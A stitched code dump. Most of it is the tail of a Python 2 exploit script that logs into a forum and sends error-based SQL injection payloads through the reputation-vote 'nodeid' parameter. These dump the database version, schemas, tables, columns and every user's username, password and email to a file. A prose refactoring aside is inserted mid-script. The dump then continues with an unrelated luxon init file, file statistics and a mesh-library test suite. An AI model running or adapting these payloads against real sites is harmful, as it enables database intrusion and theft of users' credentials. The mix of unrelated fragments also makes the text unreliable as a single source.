else:
file = open(new_host2 + '.txt', "w")
print "\n[+] Saving output to " + new_host2 + ".txt in current directory"
file.write('\n[+] Site given to inject : ' + host + "\n")
login_host = host + 'auth/login'
response = opener.open(login_host, data_encoded)
vote_host = host + 'ajax/api/reputation/vote'
print "\n\t\t\t\t[=] Requesting data... [=]\n"
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(version() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] version : ' + result.group(1) + ""
file.write('[+] version : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node +') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(database() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] Current Database : ' + result.group(1) + ""
current_db = result.group(1)
current_db = current_db.strip("'")
file.write('[+] Current Database : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(user() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] User : ' + result.group(1) + ""
file.write('[+] User : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(system_user() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] System User : ' + result.group(1) + ""
file.write('[+] System User : ' + result.group(1) + "\n")
print "\n[=] Trying to extract first row of table user from current database. To extract more go with all option! "
file.write("\n[=] Trying to extract first row of table user from current database. To extract more go with all option! \n")
try:
ext = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,username,0x7e,password,0x27,0x787e63) FROM " + current_db + "." + "user LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, ext)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
u_p = result.group(1)
upwd = u_p.split('~')
print '\n[+] username : Password => ' + upwd[0] + " : " + upwd[1]
file.write('\n[+] username : Password => ' + upwd[0] + " : " + upwd[1] + "\n")
except KeyboardInterrupt:
print "\n[=] Error in retriving datas from table 'user' of current db. "
print "\n[-] Keyboard interrupted or ctrl+c pressed. Try again."
except:
print "\n[=] Error in retriving datas from table 'user' of current db. "
print "[=] May be table user doesn't exist in current database.Try with option all."
print "\n[+] You had choosed common option for extraction. Choose all for more options and extraction."
print "\n[=>] Enjoy."
file.write("\n[+] You had choosed common option for extraction. Choose all for more options and extraction.\n")
file.write("\n[=>] Enjoy.")
file.close()
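Every probe in the function above repeats the same parse step: read the response and pull the value the payload wrapped between the 0x787e63 markers (the literal text x~c). That recurring step could be factored into one helper — a sketch, not part of the original script:

```python
import re

def extract_marked(body, marker="x~c"):
    """Return the text between two marker occurrences, quotes stripped, or None if absent."""
    m = re.search(re.escape(marker) + "(.*?)" + re.escape(marker), body)
    return m.group(1).strip("'") if m else None

print(extract_marked("junk x~c'5.6.12'x~c junk"))
```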
def all():
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
formdata = { "url" : host, "username" : username, "password" : password }
data_encoded = urllib.urlencode(formdata)
print "\n[+] Logging in .. "
print "[+] Username : " + username + ""
print "[+] Password : " + password + ""
print "[+] Node id : " + node + ""
if os.path.exists(new_host2 + '.txt'):
file = open(new_host2 + '.txt', "a")
else:
file = open(new_host2 + '.txt', "w")
print "\n[+] Saving output to " + new_host2 + ".txt in current directory"
file.write('\n[+] Site given to inject : ' + host + "\n")
login_host = host + 'auth/login'
response = opener.open(login_host, data_encoded)
vote_host = host + 'ajax/api/reputation/vote'
print "\n\t\t\t\t[=] Requesting data... [=]\n"
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(version() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] version : ' + result.group(1) + ""
file.write('[+] version : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node +') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(database() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] Current Database : ' + result.group(1) + ""
current_db = result.group(1)
current_db = current_db.strip("'")
file.write('[+] Current Database : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(user() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] User : ' + result.group(1) + ""
file.write('[+] User : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(system_user() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] System User : ' + result.group(1) + ""
file.write('[+] System User : ' + result.group(1) + "\n")
try:
print "\n[=] Trying to extract first row of table user from current database."
file.write("\n[=] Trying to extract first row of table user from current database. \n")
ext = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,username,0x7e,password,0x27,0x787e63) FROM " + current_db + "." + "user LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, ext)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
u_p = result.group(1)
upwd = u_p.split('~')
print '[+] username : Password => ' + upwd[0] + " : " + upwd[1]
file.write('\n[+] username : Password => ' + upwd[0] + " : " + upwd[1] + "\n")
count = 'nodeid=' + node +") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,count(*),0x27,0x787e63) FROM user )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '\n[+] Count of rows [table = user] : ' + result.group(1) + ""
file.write('\n[+] Count of rows [table = user] : ' + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
option = raw_input("[=] Would you like to extract all rows of [Table = user] [Column = username,password,email] ? (yes/no) ")
if option == 'yes':
for a in range(0, count):
db = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,username,0x7e,password,0x27,0x787e63) FROM " + current_db + "." + "user LIMIT " + str(a) + ",1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
u_p = result.group(1)
upwd = u_p.split('~')
email = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,email,0x27,0x787e63) FROM " + current_db + "." + "user LIMIT " + str(a) + ",1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, email)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
u_p = result.group(1)
u_p = u_p.strip("'")
print '\n[+] Username : Password : Email => ' + upwd[0] + " : " + upwd[1] + " : " + u_p
file.write('\n[+] Username : Password : Email => ' + upwd[0] + " : " + upwd[1] + " : " + u_p + "\n")
else:
print "[=] Choosed not to extract data.. "
except KeyboardInterrupt:
print "\n[=] Error in retriving datas from table 'user' of current db. "
print "\n[-] Keyboard interrupted or ctrl+c pressed. Try again."
except:
print "\n[=] Error in retriving datas from table 'user' of current db. "
print "[=] May be table user doesn't exist in current database.Try going through option fetching datas.\n"
vote_host = host + 'ajax/api/reputation/vote'
count = 'nodeid=' + node +') and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x787e63,0x27,count(schema_name),0x27,0x787e63) FROM information_schema.schemata )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] Count Of Databases : ' + result.group(1) + ""
file.write('[+] Count Of Databases : ' + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
print "\n[=] Extracting all databases..."
for c in range(0, count):
db = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x787e63,0x27,cast(schema_name as char),0x27,0x787e63) FROM information_schema.schemata LIMIT ' + str(c) + ',1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
if result is None:
exit()
else:
print '[+] Database [%s] : ' % c + result.group(1) + ""
file.write('[+] Database [%s] : ' % c + result.group(1) + "\n")
option = raw_input("\n[=] Would you like to extract databases tables ? (yes/no) ")
if option == 'yes':
print "[+] Choosed to extract database tables too. "
dbs = raw_input("[=] Enter database name to extract tables : " )
count = 'nodeid=' + node +") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,count(table_name),0x27,0x787e63) FROM `information_schema`.tables WHERE table_schema='" + dbs + "')) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '\n[+] Count of tables where [database = %s] : ' % dbs + result.group(1) + ""
file.write('\n[+] Count of tables where [database = %s] : ' % dbs + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
print "\n[=] Extracting all tables..."
for c in range(0, count):
db = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x787e63,0x27,cast(table_name as char),0x27,0x787e63) FROM information_schema.tables Where table_schema='" + dbs + "' LIMIT " + str(c) + ",1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
if result is None:
print "[=] Error in retrieving data or you entered a wrong database name "
exit()
else:
print '[+] Table [%s] [%s] : ' % (dbs, c) + result.group(1) + ""
file.write('[+] Table [%s] [%s] : ' % (dbs, c) + result.group(1) + "\n")
elif option == 'no':
print "[=] You chose not to extract tables."
else:
print "[=] Invalid Option. Exiting.. "
exit()
option_column = raw_input("\n[=] Would you like to extract columns ? {yes/no) ")
if option_column == 'yes':
print "[+] Choosed to extract columns too"
dbs = raw_input("[=] Enter database name to extract columns : " )
table = raw_input("[=] Enter table name to extract columns : " )
count = 'nodeid=' + node +") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,count(column_name),0x27,0x787e63) FROM `information_schema`.columns WHERE table_schema='" + dbs + "' AND table_name='" + table + "')) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '\n[+] Count of columns where [database = %s] [table = %s] : ' % (dbs, table) + result.group(1) + ""
file.write('\n[+] Count of columns where [database = %s] [table = %s] : ' % (dbs, table) + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
print "\n[=] Extracting all columns..."
for c in range(0, count):
db = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x787e63,0x27,cast(column_name as char),0x27,0x787e63) FROM `information_schema`.columns WHERE table_schema='" + dbs + "' AND table_name='" + table + "' LIMIT " + str(c) +",1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
if result is None:
print "[=] Error in retrieving data or you entered a wrong database or table name "
exit()
else:
print '[+] Column [%s] [%s] [%s] : ' % (dbs, table, c) + result.group(1) + ""
file.write('[+] Column [%s] [%s] [%s] : ' % (dbs, table, c) + result.group(1) + "\n")
elif option_column == 'no':
print "[=] You chose not to extract columns."
else:
print "[=] Invalid Option. "
option_column = raw_input("\n[=] Would you like to fetch datas ? {yes/no) ")
if option_column == 'yes':
print "[+] Choosed to fetch datas too"
dbs = raw_input("[=] Enter database name : " )
table = raw_input("[=] Enter table name : " )
column = raw_input("[=] Enter column name : ")
print "[=] Counting data of given column .. "
count = 'nodeid=' + node +") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,count(*),0x27,0x787e63) FROM " + dbs + "." + table + " )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '\n[+] Count of rows where [database = %s] [table = %s] : ' % (dbs, table) + result.group(1) + ""
file.write('\n[+] Count of rows where [database = %s] [table = %s] : ' % (dbs, table) + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
print "\n[=] Extracting all datas of given column..."
for c in range(0, count):
db = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27," + column + ",0x27,0x787e63) FROM " + dbs + "." + table + " LIMIT " + str(c) + ",1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
if result is None:
print "[=] Error in retrieving data or you entered a wrong database or table name "
exit()
else:
print '[+] Column [%s] [%s] [%s] [%s] : ' % (dbs, table, column, c) + result.group(1) + ""
file.write('[+] Column [%s] [%s] [%s] [%s] : ' % (dbs, table, column, c) + result.group(1) + "\n")
elif option_column == 'no':
print "[=] You chose not to extract data. Exiting.."
file.close()
exit()
else:
print "[=] Invalid Option. Exiting.. "
file.close()
exit()
if opt == 'all':
all()
elif opt == 'common':
common()
except KeyboardInterrupt:
print "\n[-] Keyboard interrupted or ctrl+c pressed. Try again."
except Exception as e:
print "\n[-] Error Occured. Try again. "
print "\n[=] Enter 'help' to get help. Example : exploit.py help"
# File: luxon/core/policy/__init__.py (repo: HieronymusCrouse/luxon, license: BSD-3-Clause)
from luxon.core.policy.compiler import compiler
from luxon.core.policy.policy import Policy
| 30.666667 | 47 | 0.847826 | 14 | 92 | 5.571429 | 0.428571 | 0.230769 | 0.333333 | 0.487179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 92 | 2 | 48 | 46 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a8d7af4b502c25795cf41c3955e883aa42435475 | 17,151 | py | Python | test/testAbTriangularMesh.py | menta78/alphaBetaLab | 8fac6cc5bd640a008bb9c0d85702053bf010e071 | [
"MIT"
] | 3 | 2019-11-18T21:06:40.000Z | 2022-01-28T14:45:00.000Z | test/testAbTriangularMesh.py | menta78/alphaBetaLab | 8fac6cc5bd640a008bb9c0d85702053bf010e071 | [
"MIT"
] | 2 | 2020-09-19T14:32:02.000Z | 2022-01-24T12:22:44.000Z | test/testAbTriangularMesh.py | menta78/alphaBetaLab | 8fac6cc5bd640a008bb9c0d85702053bf010e071 | [
"MIT"
] | 2 | 2018-11-29T10:36:01.000Z | 2021-06-16T03:29:01.000Z | import unittest
import os
import numpy as np
from shapely import geometry as g
from alphaBetaLab import abTriangularMesh
plotPolygons = False
class testAbTriangularMesh(unittest.TestCase):
def testLoadFromGr3File1(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
# some random checks
self.assertEqual(708, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([253, 302, 400], feMeshSpec.connectionPolygons[200])
self.assertEqual(410, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((-77.3890650728, 17.6616614616), feMeshSpec.nodes[350])
self.assertEqual(410, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(1372, feMeshSpec.nodeBathy[150])
self.assertEqual(64, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertFalse(5 in feMeshSpec.openBoundaryNodes)
self.assertTrue(22 in feMeshSpec.openBoundaryNodes)
bnd = np.unique(list(feMeshSpec.openBoundaryNodes.values()))
self.assertEqual([1], bnd)
self.assertEqual(1, feMeshSpec.openBoundaryNodes[22])
self.assertEqual(48, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertFalse(3 in feMeshSpec.landBoundaryNodes)
self.assertTrue(25 in feMeshSpec.landBoundaryNodes)
bnd = np.unique(list(feMeshSpec.landBoundaryNodes.values()))
self.assertEqual([1], bnd)
def testLoadFromGr3File2(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridSmallIsland.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
# some random checks
self.assertEqual(507, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([262, 280, 263], feMeshSpec.connectionPolygons[200])
self.assertEqual(287, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((155.9556546618, -57.5789348057), feMeshSpec.nodes[150])
self.assertEqual(287, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(-3368, feMeshSpec.nodeBathy[150])
self.assertEqual(0, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(35, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertFalse(100 in feMeshSpec.landBoundaryNodes)
self.assertTrue(27 in feMeshSpec.landBoundaryNodes)
self.assertEqual(1, feMeshSpec.landBoundaryNodes[27])
self.assertEqual(2, feMeshSpec.landBoundaryNodes[5])
bnd = np.unique(list(feMeshSpec.landBoundaryNodes.values()))
self.assertTrue(np.array_equal([1, 2], bnd))
def testLoadFromGr3File3(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridWestMed.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
# some random checks
self.assertEqual(1587, len(feMeshSpec.nodes.keys()))
self.assertEqual(2819, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([500, 537, 525], feMeshSpec.connectionPolygons[100])
self.assertEqual(2, len(feMeshSpec.openBoundaries.keys()))
bndnds = feMeshSpec.openBoundaries[2]
self.assertEqual(6, len(bndnds))
self.assertEqual(1556, bndnds[3])
self.assertEqual(11, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(352, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertEqual(352, len(feMeshSpec.landBoundaryOrdered))
self.assertEqual(5, len(feMeshSpec.landBoundaries.keys()))
self.assertEqual(5, len(feMeshSpec.landBoundaryType.keys()))
self.assertEqual(abTriangularMesh.landBoundaryExteriorType, feMeshSpec.landBoundaryType[1])
self.assertEqual(abTriangularMesh.landBoundaryIslandType, feMeshSpec.landBoundaryType[5])
bndnds = feMeshSpec.landBoundaries[3]
self.assertEqual(8, len(bndnds))
self.assertEqual(453, bndnds[-1])
def testSaveGr3File(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridWestMed.gr3')
feMeshSpec0 = abTriangularMesh.loadFromGr3File(mshFilePath)
tmpfnm = './_tmp.gr3'
feMeshSpec0.saveAsGr3(tmpfnm)
try:
feMeshSpec = abTriangularMesh.loadFromGr3File(tmpfnm)
# some random checks
self.assertEqual(1587, len(feMeshSpec.nodes.keys()))
self.assertEqual(2819, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([500, 537, 525], feMeshSpec.connectionPolygons[100])
self.assertEqual(2, len(feMeshSpec.openBoundaries.keys()))
bndnds = feMeshSpec.openBoundaries[2]
self.assertEqual(6, len(bndnds))
self.assertEqual(1556, bndnds[3])
self.assertEqual(11, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(352, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertEqual(352, len(feMeshSpec.landBoundaryOrdered))
self.assertEqual(5, len(feMeshSpec.landBoundaries.keys()))
self.assertEqual(5, len(feMeshSpec.landBoundaryType.keys()))
self.assertEqual(abTriangularMesh.landBoundaryExteriorType, feMeshSpec.landBoundaryType[1])
self.assertEqual(abTriangularMesh.landBoundaryIslandType, feMeshSpec.landBoundaryType[5])
bndnds = feMeshSpec.landBoundaries[3]
self.assertEqual(8, len(bndnds))
self.assertEqual(453, bndnds[-1])
finally:
os.remove(tmpfnm)
def testCreateSchismWWMBndFile(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridWestMed.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
schismWWMBndFilePath = os.path.join(mdldir, 'triangularMeshTest/schismWWMbnd.gr3')
feMeshSpec.createSchismWWMBndFile(schismWWMBndFilePath)
try:
self.assertTrue(os.path.isfile(schismWWMBndFilePath))
dt = np.loadtxt(schismWWMBndFilePath, skiprows=2)
# some random check
self.assertEqual(1587, dt.shape[0])
self.assertEqual(4, dt.shape[1])
self.assertEqual(100, dt[99, 0])
self.assertEqual(0, dt[99, 1])
self.assertEqual(2, dt[1, 0])
self.assertEqual(1, dt[2, 1])
self.assertEqual(992, dt[991, 0])
self.assertEqual(-1, dt[991, 1])
finally:
os.remove(schismWWMBndFilePath)
def testGetCellPolygons_all(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
nodeIds, cellPly = feMeshSpec.getCellPolygons(excludeLandBoundary=False,
excludeOpenBoundary=False)
self.assertEqual(410, len(nodeIds))
self.assertEqual(410, len(cellPly))
for nid, cp in zip(nodeIds, cellPly):
ndpt = g.Point(feMeshSpec.nodes[nid])
self.assertTrue(cp.contains(ndpt) or cp.boundary.contains(ndpt))
if plotPolygons:
import plot.abPolyPlot as pp
pp.plotFeMesh(feMeshSpec.nodes, feMeshSpec.connectionPolygons)
pp.plotPolyList(cellPly, doshow=True, title='all')
def testGetCellPolygons_excludeLandBoundary(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
nodeIds, cellPly = feMeshSpec.getCellPolygons(excludeLandBoundary=True,
excludeOpenBoundary=False)
self.assertEqual(362, len(nodeIds))
self.assertEqual(362, len(cellPly))
for nid, cp in zip(nodeIds, cellPly):
ndpt = g.Point(feMeshSpec.nodes[nid])
self.assertTrue(cp.contains(ndpt) or cp.boundary.contains(ndpt))
if plotPolygons:
import plot.abPolyPlot as pp
pp.plotFeMesh(feMeshSpec.nodes, feMeshSpec.connectionPolygons)
pp.plotPolyList(cellPly, doshow=True, title='exclude land boundary')
def testGetCellPolygons_excludeAllBoundary(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
nodeIds, cellPly = feMeshSpec.getCellPolygons(excludeLandBoundary=True,
excludeOpenBoundary=True)
self.assertEqual(298, len(nodeIds))
self.assertEqual(298, len(cellPly))
for nid, cp in zip(nodeIds, cellPly):
ndpt = g.Point(feMeshSpec.nodes[nid])
self.assertTrue(cp.contains(ndpt) or cp.boundary.contains(ndpt))
if plotPolygons:
import plot.abPolyPlot as pp
pp.plotFeMesh(feMeshSpec.nodes, feMeshSpec.connectionPolygons)
pp.plotPolyList(cellPly, doshow=True, title='exclude all boundary')
def testGetCellPolygons_file2(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridSmallIsland.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
nodeIds, cellPly = feMeshSpec.getCellPolygons()
self.assertEqual(252, len(nodeIds))
self.assertEqual(252, len(cellPly))
for nid, cp in zip(nodeIds, cellPly):
ndpt = g.Point(feMeshSpec.nodes[nid])
self.assertTrue(cp.contains(ndpt) or cp.boundary.contains(ndpt))
if plotPolygons:
import plot.abPolyPlot as pp
pp.plotFeMesh(feMeshSpec.nodes, feMeshSpec.connectionPolygons)
pp.plotPolyList(cellPly, doshow=True, title='exclude land boundary')
def testLoadFromMshFile1(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/med.msh')
feMeshSpec = abTriangularMesh.loadFromMshFile(mshFilePath)
# some random checks
self.assertEqual(24996, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([4293, 4292, 11180], feMeshSpec.connectionPolygons[7])
self.assertEqual(16514, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((4.98622, 43.39583), feMeshSpec.nodes[350])
self.assertEqual(16514, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(0, feMeshSpec.nodeBathy[150])
self.assertAlmostEqual(-1793.89160670, feMeshSpec.nodeBathy[11234])
self.assertEqual(0, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(5993, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertEqual(5993, len(feMeshSpec.landBoundaryOrdered))
self.assertTrue(1 in feMeshSpec.landBoundaryNodes)
self.assertTrue(100 in feMeshSpec.landBoundaryNodes)
self.assertFalse(6000 in feMeshSpec.landBoundaryNodes)
self.assertTrue(1 in feMeshSpec.landBoundaryOrdered)
self.assertTrue(100 in feMeshSpec.landBoundaryOrdered)
self.assertFalse(6000 in feMeshSpec.landBoundaryOrdered)
def testSaveMshFile1(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/med.msh')
feMeshSpec = abTriangularMesh.loadFromMshFile(mshFilePath)
mshTestFilePath = os.path.join(mdldir, 'triangularMeshTest/test_med_copy.msh')
feMeshSpec.saveAsMsh(mshTestFilePath)
try:
self.assertTrue(os.path.isfile(mshTestFilePath))
feMeshSpec = abTriangularMesh.loadFromMshFile(mshTestFilePath)
self.assertEqual(24996, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([4293, 4292, 11180], feMeshSpec.connectionPolygons[7])
self.assertEqual(16514, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((4.98622, 43.39583), feMeshSpec.nodes[350])
self.assertEqual(16514, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(0, feMeshSpec.nodeBathy[150])
self.assertAlmostEqual(1793.8916, feMeshSpec.nodeBathy[11234], 4)
self.assertEqual(0, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(5993, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertTrue(1 in feMeshSpec.landBoundaryNodes)
self.assertTrue(100 in feMeshSpec.landBoundaryNodes)
self.assertFalse(6000 in feMeshSpec.landBoundaryNodes)
finally:
os.remove(mshTestFilePath)
def testSaveMshFile2(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridSmallIsland.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
mshTestFilePath = os.path.join(mdldir, 'triangularMeshTest/test_smallIsland_copy.msh')
feMeshSpec.saveAsMsh(mshTestFilePath, bathyFactor=-1)
try:
self.assertTrue(os.path.isfile(mshTestFilePath))
feMeshSpec = abTriangularMesh.loadFromMshFile(mshTestFilePath)
# some random checks
self.assertEqual(507, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([262, 280, 263], feMeshSpec.connectionPolygons[200])
self.assertEqual(287, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((155.9556547, -57.57893481), feMeshSpec.nodes[150])
self.assertEqual(287, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(3368, feMeshSpec.nodeBathy[150])
self.assertEqual(0, len(feMeshSpec.openBoundaryNodes.keys()))
